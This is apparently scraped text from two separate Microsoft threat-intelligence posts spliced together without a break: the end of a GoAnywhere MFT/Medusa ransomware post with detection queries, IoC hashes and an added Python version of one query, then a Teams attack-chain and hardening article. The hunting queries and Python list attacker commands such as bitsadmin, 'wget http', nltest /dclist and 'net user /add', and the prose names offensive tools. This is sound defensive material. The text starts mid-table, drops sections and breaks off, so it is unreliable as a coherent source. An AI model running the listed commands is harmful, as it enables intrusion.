Dropping and abuse of remote monitoring and management (RMM) tool and suspected web shell deployment; creation of .jsp files within the GoAnywhere MFT directories
Microsoft Defender for Endpoint detects possible signs of the attacker deploying persistence mechanisms via the following alerts: – Uncommon remote access software – Remote access software – Suspicious file dropped and launched – Suspicious service launched – Suspicious account creation – User account created under suspicious circumstances – New local admin added using Net commands – New group added suspiciously – Suspicious Windows account manipulation – Ransomware-linked threat actor detected
Discovery
User and system discovery commands; deployment of tools such as netscan for network discovery
Microsoft Defender for Endpoint detects malicious exploration activities via the following alerts: – Suspicious sequence of exploration activities – Anomalous account lookups – Suspicious Windows account manipulation
Command and control
Use of RMM tools for establishing C2 infrastructure and setup of Cloudflare tunnel for secure C2 communication
Microsoft Defender for Endpoint detects C2 activities observed in this campaign via the following alerts: – Uncommon remote access software – Remote access software
Exfiltration
Rclone deployment and execution
Microsoft Defender for Endpoint detects exfiltration activities observed in this campaign via the following alert: – Ransomware-linked threat actor detected
Actions on objectives
Deployment of Medusa ransomware
Microsoft Defender Antivirus detects the ransomware payload used in this attack as the following threat:
– Ransom:Win32/Medusa
Microsoft Defender for Endpoint detects the ransomware payload via the following alert:
– Ransomware-linked threat actor detected
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following queries to find related activity in their networks:
Vulnerable devices
Find devices affected by the CVE-2025-10035 vulnerability.
DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2025-10035")
| summarize by DeviceName, CveId
Possible GoAnywhere MFT exploitation
Look for suspicious PowerShell commands indicative of GoAnywhere MFT exploitation. These commands are also detected with the Defender for Endpoint alert Possible exploitation of GoAnywhere MFT vulnerability.
Look for suspicious cmd.exe commands launched after possible GoAnywhere MFT exploitation. These commands are also detected with the Defender for Endpoint alert Possible exploitation of GoAnywhere MFT vulnerability.
DeviceProcessEvents
| where InitiatingProcessFolderPath contains @"\GoAnywhere\"
| where InitiatingProcessFileName contains "tomcat"
| where InitiatingProcessCommandLine endswith "//RS//GoAnywhere"
| where ProcessCommandLine !contains @"\GIT\"
| where FileName == "cmd.exe"
| where ProcessCommandLine has_any ("powershell.exe", "powershell ", "rundll32.exe", "rundll32 ", "bitsadmin.exe", "bitsadmin ", "wget http", "quser")
    or ProcessCommandLine has_all ("nltest", "/dclist")
    or ProcessCommandLine has_all ("nltest", "/domain_trusts")
    or ProcessCommandLine has_all ("net", "user ", "/add")
    or ProcessCommandLine has_all ("net", "user ", " /domain")
    or ProcessCommandLine has_all ("net", " group", "/domain")
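To exercise the same parent-process logic offline before turning the query into a custom detection, here is an added Python re-implementation (example code, not from the original post) run over constructed DeviceProcessEvents-style records. KQL's term-based `has` is approximated by whole-token matching, and every sample event below is constructed rather than taken from a real incident.

```python
import re
from dataclasses import dataclass

# Constructed records shaped like the DeviceProcessEvents columns the query
# reads. Hypothetical sample data, not taken from any real incident.
@dataclass
class ProcessEvent:
    InitiatingProcessFolderPath: str
    InitiatingProcessFileName: str
    InitiatingProcessCommandLine: str
    FileName: str
    ProcessCommandLine: str

# Terms copied from the has_any / has_all clauses of the hunting query.
ANY_TERMS = ["powershell.exe", "powershell ", "rundll32.exe", "rundll32 ",
             "bitsadmin.exe", "bitsadmin ", "wget http", "quser"]
ALL_TERM_GROUPS = [("nltest", "/dclist"), ("nltest", "/domain_trusts"),
                   ("net", "user ", "/add"), ("net", "user ", " /domain"),
                   ("net", " group", "/domain")]


def _tokens(text):
    return re.findall(r"[a-z0-9_]+", text.lower())


def has_term(command_line, term):
    """Approximation of KQL 'has': the term's tokens must appear as a
    contiguous run of whole tokens in the command line, case-insensitively."""
    cl, t = _tokens(command_line), _tokens(term)
    if not t:
        return False
    return any(cl[i:i + len(t)] == t for i in range(len(cl) - len(t) + 1))


def is_goanywhere_tomcat_child(ev):
    """Parent-process clauses of the query: cmd.exe spawned by the GoAnywhere
    Tomcat service, excluding children that invoke the bundled Git tooling."""
    folder = ev.InitiatingProcessFolderPath.lower()
    return ("\\goanywhere\\" in folder
            and "tomcat" in ev.InitiatingProcessFileName.lower()
            and ev.InitiatingProcessCommandLine.lower().endswith("//rs//goanywhere")
            and "\\git\\" not in ev.ProcessCommandLine.lower()
            and ev.FileName == "cmd.exe")


def is_suspicious_command(command_line):
    """Command-line clauses: any single term, or every term of one group."""
    return (any(has_term(command_line, t) for t in ANY_TERMS)
            or any(all(has_term(command_line, t) for t in group)
                   for group in ALL_TERM_GROUPS))


def find_hits(events):
    """Return the command lines that satisfy every clause of the query."""
    return [ev.ProcessCommandLine for ev in events
            if is_goanywhere_tomcat_child(ev)
            and is_suspicious_command(ev.ProcessCommandLine)]


# Constructed sample: one GoAnywhere Tomcat parent with benign and suspicious
# children, plus an unrelated parent that must not match.
_TOMCAT = dict(
    InitiatingProcessFolderPath="C:\\Program Files\\GoAnywhere\\tomcat\\bin",
    InitiatingProcessFileName="tomcat9.exe",
    InitiatingProcessCommandLine='"C:\\Program Files\\GoAnywhere\\tomcat\\bin\\tomcat9.exe" //RS//GoAnywhere',
    FileName="cmd.exe",
)
SAMPLE_EVENTS = [
    ProcessEvent(**_TOMCAT, ProcessCommandLine="cmd.exe /c powershell -enc AAAA"),
    ProcessEvent(**_TOMCAT, ProcessCommandLine="cmd.exe /c nltest /dclist:corp"),
    ProcessEvent(**_TOMCAT, ProcessCommandLine='cmd.exe /c "C:\\Program Files\\GoAnywhere\\GIT\\bin\\git.exe" status'),
    ProcessEvent(**_TOMCAT, ProcessCommandLine="cmd.exe /c dir"),
    ProcessEvent(InitiatingProcessFolderPath="C:\\Windows", InitiatingProcessFileName="explorer.exe",
                 InitiatingProcessCommandLine="explorer.exe", FileName="cmd.exe",
                 ProcessCommandLine="cmd.exe /c powershell -File build.ps1"),
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_EVENTS):
        print("suspicious GoAnywhere child:", hit)
```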
Storm-1175 indicators of compromise
The following query identifies known post-compromise tools leveraged in recent GoAnywhere exploitation activity attributed to Storm-1175. Note that the alert Ransomware-linked threat actor detected will detect these hashes.
let fileHashes = dynamic(["4106c35ff46bb6f2f4a42d63a2b8a619f1e1df72414122ddf6fd1b1a644b3220", "c7e2632702d0e22598b90ea226d3cde4830455d9232bd8b33ebcb13827e99bc3", "cd5aa589873d777c6e919c4438afe8bceccad6bbe57739e2ccb70b39aee1e8b3", "5ba7de7d5115789b952d9b1c6cff440c9128f438de933ff9044a68fff8496d19"]);
union
(
DeviceFileEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceFileEvents"
),
(
DeviceEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceEvents"
),
(
DeviceImageLoadEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceImageLoadEvents"
),
(
DeviceProcessEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceProcessEvents"
)
| order by Timestamp desc
Indicators of compromise
File IoCs (RMM tools in identified Storm-1175 exploitation activity):
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
The extensive collaboration features and global adoption of Microsoft Teams make it a high-value target for both cybercriminals and state-sponsored actors. Threat actors abuse its core capabilities – messaging (chat), calls and meetings, and video-based screen-sharing – at different points along the attack chain. This raises the stakes for defenders to proactively monitor, detect, and respond.
While under Microsoft’s Secure Future Initiative (SFI), default security has been strengthened by design, defenders still need to make the most out of customer-facing security capabilities. Therefore, this blog recommends countermeasures and controls across identity, endpoints, data apps, and network layers to help harden enterprise Teams environments. To frame these defenses, we first examine relevant stages of the attack chain. This guidance complements, but doesn’t repeat, the guidance built into the Microsoft Security Development Lifecycle (SDL) as outlined in the Teams Security Guide; we will instead focus on guidance for disrupting adversarial objectives based on the relatively recently observed attempts to exploit Teams infrastructure and capabilities.
Attack chain
Figure 1. Attack techniques that abuse Teams along the attack chain
Reconnaissance
Every Teams user account is backed by a Microsoft Entra ID identity. Each team member is an Entra ID object, and a team is a collection of channel objects. Teams may be configured for the cloud or a hybrid environment and supports multi-tenant organizations (MTO) and cross-tenant communication and collaboration. There are anonymous participants, guests, and external access users. From an API perspective, Teams is an object type that can be queried and stored in a local database for reconnaissance by enumerating directory objects, and mapping relationships and privileges. For example, federation tenant configuration indicates whether the tenant allows external communication and can be inferred from the API response queries reflecting the effective tenant federation policy.
While not unique to Teams, there are open-source frameworks that can specifically be leveraged to enumerate less secure users, groups, and tenants in Teams (mostly by repurposing the Microsoft Graph API or gathering DNS), including ROADtools, TeamFiltration, TeamsEnum, and MSFT-Recon-RS. These tools facilitate enumerating teams, members of teams and channels, tenant IDs and enabled domains, as well as permissiveness for communicating with external organizations and other properties, like presence. Presence indicates a user’s current availability and status outside the organization if Privacy mode is not enabled, which could then be exploited if the admin has not disabled external meetings and chat with people and organizations outside the organization (or at least limited it to specified external domains).
Many open-source tools are modular Python packages including reusable libraries and classes that can be directly imported or extended to support custom classes, meaning they are also interoperable with other custom open-source reconnaissance and discovery frameworks designed to identify potential misconfigurations.
Resource development
Microsoft continuously enhances protections against fraudulent Microsoft Entra ID Workforce tenants and the abuse of free tenants and trial subscriptions. As these defenses grow stronger, threat actors are forced to invest significantly more resources in their attempts to impersonate trusted users, demonstrating the effectiveness of our layered security approach. This includes threat actors trying to compromise weakly configured legitimate tenants, or even purchasing legitimate ones if they are confident they could ultimately profit. It should come as no surprise that if they can build a persona for social engineering, they will take advantage of the same resources as legitimate organizations, including custom domains and branding, especially if it lends credibility to impersonating internal help desk, admin, or IT support, which could then be used as a convincing pretext to compromise targets through chat messaging and phone calls. Sophisticated threat actors try to use the very same resources used by trustworthy organizations, such as acquiring multiple tenants for staging development or running separate operations across regions, and using everyday Teams features like scheduling private meetings through chat, and audio, video and screen-sharing capabilities for productivity.
Initial access
Tech support scams remain a generally popular pretext for delivery of malicious remote monitoring and management (RMM) tools and information-stealing malware, leading to credential theft, extortion, and ransomware. There are always new variants to bypass security awareness defenses, such as the rise in email bombing to create a sense of stress and urgency to restore normalcy. In 2024, for instance, Storm-1811 impersonated tech support, claiming to be addressing junk email issues that it had initiated. They used RMM tools to deliver the ReedBed malware loader, which in turn delivered ransomware payloads and enabled remote command execution. Meanwhile, Midnight Blizzard has successfully impersonated security and technical support teams to get targets to verify their identities under the pretext of protecting their accounts by entering authentication codes that complete the authentication flow for breaking into the accounts.
Similarly in May, Sophos identified a 3AM ransomware (believed to be a rebranding of BlackSuit) affiliate adopting techniques from Storm-1811, including flooding employees with unwanted emails followed by voice and video calls on Teams impersonating help desk personnel, claiming they needed remote access to stop the flood of junk emails. The threat actor reportedly spoofed the IT organization’s phone number.
With threat actors leveraging deepfakes, perceived authority helps make this kind of social engineering even more effective. Threat actors seeking to spoof automated workflow notifications and interactions can naturally extend to spoofing legitimate bots and agents as they gain more traction, as threat actors are turning to language models to facilitate their objectives.
Prevalent threat actors associated with ransomware campaigns, including the access broker tracked as Storm-1674, have used sophisticated red teaming tools, like TeamsPhisher, to distribute DarkGate malware and other malicious payloads over Teams. In December 2024, for example, Trend Micro reported an incident in which a threat actor impersonated a client during a Teams call to persuade a target to install AnyDesk. That remote access was then reportedly used to deploy DarkGate as well. Threat actors may also simply use Teams to gain initial access through drive-by-compromise activity that directs users to malicious websites.
Widely available admin tools, including AADInternals, could be leveraged to deliver malicious links and payloads directly into Teams. Teams branding (like any communications brand asset) makes for effective bait, and has been used by adversary-in-the-middle (AiTM) actors like Storm-00485. Threat actors could place malicious advertisements in search results for a spoofed app like Teams to misdirect users to a download site hosting credential-stealing malware. In July 2025, for instance, Malwarebytes reported observing a malvertising campaign delivering credential-stealing malware through a fake Microsoft Teams for Mac installer.
Whether it is a core app that is part of Teams, an app created by Microsoft, a partner app validated by Microsoft, or a custom app created by your own organization—no matter how secure the app is—it could still be spoofed to gain a foothold in a network. And similar to leveraging a trusted brand like Teams, threat actors will also continue to try to take advantage of trusted relationships to gain Teams access, whether leveraging an account with access or abusing delegated administrator relationships to reach a target environment.
Persistence
Threat actors employ a variety of persistence techniques to maintain access to target systems—even after defenders attempt to regain control. These methods include abusing shortcuts in the Startup folder to execute malicious tools, or exploiting accessibility features like Sticky Keys (as seen in this ransomware case study). Threat actors could try to create guest users in target tenants or add their own credentials to a Teams account to maintain access.
Part of the reason device code phishing has been used to access target accounts is that it could enable persistent access for as long as the tokens remain valid. In February, Microsoft reported that Storm-2372 had been capturing authentication tokens by exploiting device code authentication flows, partially by masquerading as Microsoft Teams meeting invitations and initiating Teams chats to build rapport, so that when the targets were prompted to authenticate, they would use Storm-2372-generated device codes, enabling Storm-2372 to steal the authenticated sessions from the valid access tokens.
Teams phishing lures themselves can sometimes be a disguised attempt to help threat actors maintain persistence. For example, in July 2025, the financially motivated Storm-0324 most likely relied on TeamsPhisher to send Teams phishing lures to deliver a custom malware JSSloader for the ransomware operator Sangria Tempest to use as an access vector to maintain a foothold.
Execution
Apart from admin accounts, which are an attractive target because they come with elevated privileges, threat actors try and trick everyday Teams users into clicking links or opening files that lead to malicious code execution, just like through email.
Privilege escalation
If threat actors successfully compromise accounts or register actor-controlled devices, they often try to change permission groups to escalate privileges. If a threat actor successfully compromises a Teams admin role, this could lead to abuse of the permissions to use the admin tools that belong to that role.
Credential access
With a valid refresh token, actors can impersonate users through Teams APIs. There is no shortage of administrator tools that can be maliciously repurposed, such as AADInternals, to intercept access to tokens with custom phishing flows. Tools like TeamFiltration could be leveraged just like for any other Microsoft 365 service for targeting Teams. If credentials are compromised through password spraying, threat actors use tools like this to request OAuth tokens for Teams and other services. Threat actors continue to try and bypass multifactor authentication (MFA) by repeatedly generating authentication prompts until someone accepts by mistake, and try to compromise MFA by adding alternate phone numbers or intercepting SMS-based codes.
For instance, the financially motivated threat actor Octo Tempest uses aggressive social engineering, including over Teams, to take control of MFA for privileged accounts. They consistently socially engineer help desk personnel, targeting federated identity providers using tools like AADInternals to federate existing domains, or spoof legitimate domains by adding and then federating new domains to forge tokens.
Discovery
To refine targeting, threat actors analyze Teams configuration data from API responses, enumerate Teams apps if they obtain unauthorized access, and search for valuable files and directories by leveraging toolkits for contextualizing potential attack paths. For instance, Void Blizzard has used AzureHound to enumerate a compromised organization’s Microsoft Entra ID configuration and gather details on users, roles, groups, applications, and devices. In a small number of compromises, the threat actor accessed Teams conversations and messages through the web client. AADInternals can also be used to discover Teams group structures and permissions.
The state-sponsored actor Peach Sandstorm has delivered malicious ZIP files through Teams, then used AD Explorer to take snapshots of on-premises Active Directory database and related files.
Lateral movement
A threat actor that manages to obtain Teams admin access (whether directly or indirectly by purchasing an admin account through a rogue online marketplace) could potentially leverage external communication settings and enable trust relationships between organizations to move laterally. In late 2024, in a campaign dubbed VEILdrive by Hunters’ Team AXON, the financially motivated cybercriminal threat actors Sangria Tempest and Storm-1674 used previously compromised accounts to impersonate IT personnel and convince a user in another organization through Teams to accept a chat request and grant access through a remote connection.
Collection
Threat actors often target Teams to try and collect information from it that could help them to accomplish their objectives, such as to discover collaboration channels or high-privileged accounts. They could try to mine Teams for any information perceived as useful in furtherance of their objectives, including pivoting from a compromised account to data accessible to that user from OneDrive or SharePoint. AADInternals can be used to collect sensitive chat data and user profiles. Post-compromise, GraphRunner can leverage the Microsoft Graph API to search all chats and channels and export Teams conversations.
Command and control
Threat actors attempt to deliver malware through file attachments in Teams chats or channels. A cracked version of Brute Ratel C4 (BRc4) includes features to establish C2 channels with platforms like Microsoft Teams by using their communications protocols to send and receive commands and data.
Post-compromise, threat actors can use red teaming tool ConvoC2 to send commands through Microsoft Teams messages using the Adaptive Card framework to embed data in hidden span tags and then exfiltrate using webhooks. But threat actors can also use legitimate remote access tools to try and establish interactive C2 through Teams.
Exfiltration
Threat actors may use Teams messages or shared links to direct data exfiltration to cloud storage under their control. Tools like TeamFiltration include an exfiltration module that relies on a valid access token to extract recent contacts and download chats and files through OneDrive or SharePoint.
Impact
Threat actors try to use Teams messages to support financial theft through extortion, social engineering, or technical means.
Octo Tempest has used communication apps, including Teams, to send taunting and threatening messages to organizations, defenders, and incident response teams as part of extortion and ransomware payment pressure tactics. After gaining control of MFA through social engineering password resets, they sign in to Teams to identify sensitive information supporting their financially motivated operations.
Configure just-in-time access to privileged roles. Use Microsoft Entra Privileged Identity Management (PIM) (preview) to provide as-needed and just-in-time access to Microsoft 365 roles to reduce standing privileges and limit exposure.
Harden endpoint security
Use configuration analyzer to strengthen security posture. Identify and remediate security policies that are less secure than the Standard or Strict protection profiles in preset security policies.
Keep Teams clients, browsers, OS, and dependencies updated.
Enable cloud-delivered protection in Defender Antivirus. Cloud-delivered protection enables sharing detection status between Microsoft 365 and Defender for Endpoint. Real-time protection blocking, including on-access scanning, is not available when Defender Antivirus is running only in passive mode. You can turn on endpoint detection and response (EDR) in block mode even if Defender Antivirus isn’t your primary antivirus solution. EDR in block mode detects and remediates malicious items on the device post-breach.
Protect security settings from being disabled or changed with tamper protection.
If your organization utilizes another remote support tool such as Remote Help, disable or remove Quick Assist as a best practice, if it isn’t used within your environment.
Understand and use attack surface reduction capabilities in your environment to prevent common techniques used in combination with Teams threat activity as part of your first line of defense.
Manage call settings in Teams. Inbound calls originating from the Public Switched Telephone Network (PSTN) on a tenant global level can be blocked.
Use meeting and event policies to control the features that are available to organizers and participants.
Use the Teams admin center or PowerShell to require anonymous users and people from untrusted organizations to complete a verification check before joining the meeting.
Manage who can present and request control to generally prevent external users by default without business justification from being able to automatically request control over a shared window or screen.
Specify which types of external meetings and chat to allow and which users should have access to these features. You can change the default setting to limit external access to only allowed domains or block specific domains and subdomains. By blocking external communication with trial-only tenants, users that do not have any purchased seats are not able to search and contact your users via chat, Teams calls, and meetings.
You can prevent users that are not managed by an organization from starting conversations or prevent chat with them. If you choose to allow anonymous users in your environment, you can verify their identities by email code to join meetings (Premium).
Monitor Teams activities using activity policies in Defender for Cloud Apps. If external users are enabled, you can monitor their presence. Defender for Cloud Apps integrates directly with Microsoft 365 audit logs. Office 365 Cloud Apps Security has access to the features of Defender for Cloud Apps to support the Office 365 app connector.
Specify which users and groups can use Microsoft Teams apps or a copilot agent and control it on a per-app basis. You can change the default setting letting users install apps by default. Evaluate the compliance, security, and data handling information of an app and also understand the permissions requested by the app before you allow an app to be used.
Teams data is encrypted in transit and at rest in Microsoft services, between services, and between clients and services. For heightened confidentiality, you can also use end-to-end encryption in advanced meeting protection that is available with the Teams Premium add-on license. This encrypts audio, video, and video-based screen sharing at its origin and decrypts it at its destination.
Get started using attack simulation training. The Teams attack simulation training is currently in private preview. Build organizational resilience by raising awareness of QR code phishing, deepfakes including voice, and about protecting your organization from tech support and ClickFix scams.
Train developers to follow best practices when working with the Microsoft Graph API. Apply these practices when detecting, defending against, and responding to malicious techniques targeting Teams.
Learn more about some of the frequent initial access threats impacting SharePoint servers. SharePoint is a front end for Microsoft Teams and an attractive target.
Configure detection and response
Verify the auditing status of your organization in Microsoft Purview to make sure you can investigate incidents. In Threat Explorer, Content malware includes files detected by Safe Attachments for Teams, and URL clicks include all user clicks in Teams.
If user reporting of messages is turned on in the Teams admin center, it also needs to be turned on in the Defender portal. We encourage you to submit user reported Teams messages to Microsoft here.
Refer to the table listing the Microsoft Teams activities logged in the Microsoft 365 audit log. With the Office 365 Management Activity API, you can retrieve information about user, admin, system, and policy actions and events including from Entra activity logs.
Familiarize yourself with relevant advanced hunting schema and available tables.
Advanced hunting supports guided and advanced modes. You can use the advanced hunting queries in the advanced hunting section to hunt with these tables for Teams-related threats.
Several tables covering Teams-related threats are available in preview and populated by Defender for Office 365, including MessageEvents, MessagePostDeliveryEvents, MessageUrlInfo, and UrlClickEvents. These tables provide visibility into ZAP events and URLs in Teams messages, including allowed or blocked URL clicks in Teams clients. You can join these tables with others to gain more comprehensive insight into the progression of the attack chain and end-to-end threat activity.
Connect Microsoft 365 to Microsoft Defender for Cloud Apps.
To hunt for Teams messages without URLs, use the CloudAppEvents table, populated by Defender for Cloud Apps. This table also includes chat monitoring events, meeting and Teams call tracking, and behavioral analytics. To make sure advanced hunting tables are populated by Defender for Cloud Apps data, go to the Defender portal and select Settings > Cloud apps > App connectors. Then, in the Select Microsoft 365 components page, select the Microsoft 365 activities checkbox. Control Microsoft 365 with built-in policies and policy templates to detect and notify you about potential threats.
Many of the detection types enabled by default apply to Teams and do not require custom policy creation, including sign-ins from geographically distant locations in a short time, access from a country not previously associated with a user, unexpected admin actions, mass downloads, activity from anonymous IP addresses or from a device flagged as malware-infected by Defender for Endpoint, as well as OAuth app abuse (when app governance is turned on).
Defender for Cloud Apps enables you to identify high-risk use and cloud security issues, detect abnormal user behavior, and prevent threats in your sanctioned cloud apps. You can integrate Defender for Cloud Apps with Microsoft Sentinel (preview) or use the supported APIs.
Refer to the compromised and malicious applications incident response playbook. This playbook includes relevant guidance for identifying and investigating malicious activity on third-party apps installed in Teams, custom apps using the Graph API for Teams, or OAuth abuse involving Teams permissions.
Discover and enable the Microsoft Sentinel data lake in Defender XDR. Sentinel data lake brings together security logs from data sources like Microsoft Defender and Microsoft Sentinel, Microsoft 365, Microsoft Entra ID, Purview, Intune, Microsoft Resource Graph, firewall and network logs, identity and access logs, DNS, plus sources from hundreds of connectors and solutions, including Microsoft Defender Threat Intelligence. Advanced hunting KQL queries can be run directly on the data lake. You can analyze the data using Jupyter notebooks.
Microsoft Defender detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender XDR
The following alerts might indicate threat activity associated with this threat.
Malicious sign in from a risky IP address
Malicious sign in from an unusual user agent
Account compromised following a password-spray attack
Compromised user account identified in Password Spray activity
Successful authentication after password spray attack
Password Spray detected via suspicious Teams client (TeamFiltration)
Microsoft Entra ID Protection
Any type of sign-in and user risk detection might also indicate threat activity associated with this threat. An example is listed below. These alerts, however, can be triggered by unrelated threat activity.
Impossible travel
Anomalous Microsoft Teams login from web client
Microsoft Defender for Endpoint
The following alerts might indicate threat activity associated with this threat.
Suspicious module loaded using Microsoft Teams
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
Suspicious usage of remote management software
Microsoft Defender for Office 365
The following alerts might indicate threat activity associated with this threat.
Malicious link shared in Teams chat
User clicked a malicious link in Teams chat
When Microsoft Defender for Cloud Apps is enabled, the following alert might indicate threat activity associated with this threat.
Potentially Malicious IT Support Teams impersonation post mail bombing
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
A potentially malicious URL click was detected
Possible AiTM phishing attempt
Microsoft Defender for Identity
The following Microsoft Defender for Identity alerts can indicate associated threat activity:
Account enumeration reconnaissance
Suspicious additions to sensitive groups
Account Enumeration reconnaissance (LDAP)
Microsoft Defender for Cloud Apps
The following alerts might indicate threat activity associated with this threat.
Consent granted to application with Microsoft Teams permissions
Risky user installed a suspicious application in Microsoft Teams
Compromised account signed in to Microsoft Teams
Microsoft Teams chat initiated by a suspicious external user
Suspicious Teams access via Graph API
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
Possible mail exfiltration by app
Microsoft Security Copilot
Microsoft Security Copilot customers can use the Copilot in Defender embedded experience to check the impact of this report and get insights based on their environment’s highest exposure level in Threat analytics, Intel profiles, Intel Explorer and Intel projects pages of the Defender portal.
You can also use Copilot in Defender to speed up analysis of suspicious scripts and command lines by inspecting them below the incident graph on an incident page and in the timeline on the Device entity page without using external tools.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Advanced hunting allows you to view and query all the data sources available within the unified Microsoft Defender portal, which include Microsoft Defender XDR and various Microsoft security services.
After onboarding to the Microsoft Sentinel data lake, auxiliary log tables are no longer available in Microsoft Defender advanced hunting. Instead, you can access them through data lake exploration Kusto Query Language (KQL) queries in the Defender portal. For more information, see KQL queries in the Microsoft Sentinel data lake.
You can design and tweak custom detection rules using the advanced hunting queries and set them to run at regular intervals, generating alerts and taking response actions whenever there are matches. You can also link the generated alert to this report so that it appears in the Related incidents tab in threat analytics. Custom detection rules can automatically take actions on devices, files, users, or emails that are returned by the query. To make sure you’re creating detections that trigger true alerts, take time to review your existing custom detections by following the steps in Manage existing custom detection rules.
Detect potential data exfiltration from Teams
let timeWindow = 1h;
let messageThreshold = 20;
let trustedDomains = dynamic(["trustedpartner.com", "anothertrusted.com"]);
CloudAppEvents
| where Timestamp > ago(1d)
| where ActionType == "MessageSent"
| where Application == "Microsoft Teams"
| where isnotempty(AccountObjectId)
| where tostring(parse_json(RawEventData).ParticipantInfo.HasForeignTenantUsers) == "true"
| where tostring(parse_json(RawEventData).CommunicationType) in ("OneOnOne", "GroupChat")
| extend RecipientDomain = tostring(parse_json(RawEventData).ParticipantInfo.ParticipatingDomains[1])
| where RecipientDomain !in (trustedDomains)
| extend SenderUPN = tostring(parse_json(RawEventData).UserId)
| summarize MessageCount = count() by bin(Timestamp, timeWindow), SenderUPN, RecipientDomain
| where MessageCount > messageThreshold
| project Timestamp, MessageCount, SenderUPN, RecipientDomain
| sort by MessageCount desc
Detect mail bombing that sometimes precedes technical support scams on Microsoft Teams
EmailEvents
| where Timestamp > ago(1d)
| where DetectionMethods contains "Mail bombing"
| project Timestamp, NetworkMessageId, SenderFromAddress, Subject, ReportId
Detect malicious Teams content from MessageEvents
MessageEvents
| where Timestamp > ago(1d)
| where ThreatTypes has "Phish"
or ThreatTypes has "Malware"
or ThreatTypes has "Spam"
| project Timestamp, SenderDisplayName, SenderEmailAddress, RecipientDetails, IsOwnedThread, ThreadType, IsExternalThread, ReportId
Detect communication with external help desk/support representatives
MessageEvents
| where Timestamp > ago(5d)
| where IsExternalThread == true
| where (RecipientDetails contains "help" and RecipientDetails contains "desk")
or (RecipientDetails contains "it" and RecipientDetails contains "support")
or (RecipientDetails contains "working" and RecipientDetails contains "home")
or (SenderDisplayName contains "help" and SenderDisplayName contains "desk")
or (SenderDisplayName contains "it" and SenderDisplayName contains "support")
or (SenderDisplayName contains "working" and SenderDisplayName contains "home")
| project Timestamp, SenderDisplayName, SenderEmailAddress, RecipientDetails, IsOwnedThread, ThreadType
Expand detection of communication with external help desk/support representatives by searching for linked process executions
let portableExecutable = pack_array("binary.exe", "portable.exe"); // placeholder names: replace with the executables observed in your environment
let timeAgo = ago(30d);
MessageEvents
| where Timestamp > timeAgo
| where IsExternalThread == true
| where (RecipientDetails contains "help" and RecipientDetails contains "desk")
or (RecipientDetails contains "it" and RecipientDetails contains "support")
or (RecipientDetails contains "working" and RecipientDetails contains "home")
| summarize spamEvent = min(Timestamp) by SenderEmailAddress
| join kind=inner (
DeviceProcessEvents
| where Timestamp > timeAgo
| where FileName in (portableExecutable)
) on $left.SenderEmailAddress == $right.InitiatingProcessAccountUpn
| where Timestamp > spamEvent // keep only process launches that happened after the first external help desk message
Surface Teams threat activity using Microsoft Security Copilot
Microsoft Security Copilot in Microsoft Defender comes with a query assistant capability in advanced hunting. You can also run the following prompt in the Microsoft Security Copilot pane on the Advanced hunting page, or by reopening Copilot from the top of the query editor:
Show me recent activity in the last 7 days that matches attack techniques described in the Microsoft Teams technique profile. Include relevant alerts, affected users and devices, and generate advanced hunting queries to investigate further.
Microsoft Sentinel
Possible Teams phishing activity
This query specifically monitors Microsoft Teams for one-on-one chats involving impersonated users (e.g., 'Help Desk', 'Microsoft Security').
let suspiciousUpns = DeviceProcessEvents
| where DeviceId == "alertedMachine" // placeholder: replace with the DeviceId of the alerted device
| where isnotempty(InitiatingProcessAccountUpn)
| project InitiatingProcessAccountUpn;
CloudAppEvents
| where Application == "Microsoft Teams"
| where ActionType == "ChatCreated"
| where isempty(AccountObjectId)
| where RawEventData.ParticipantInfo.HasForeignTenantUsers == true
| where RawEventData.CommunicationType == "OneOnOne" // value is case-sensitive; same spelling as in the Teams exfiltration query above
| where RawEventData.ParticipantInfo.HasGuestUsers == false
| where RawEventData.ParticipantInfo.HasOtherGuestUsers == false
| where tostring(RawEventData.Members[0].DisplayName) in ("Microsoft Security", "Help Desk", "Help Desk Team", "Help Desk IT", "office")
| where AccountId has "@"
| extend TargetUPN = tolower(tostring(RawEventData.Members[1].UPN))
| where TargetUPN in (suspiciousUpns)
Files uploaded to Teams and access summary
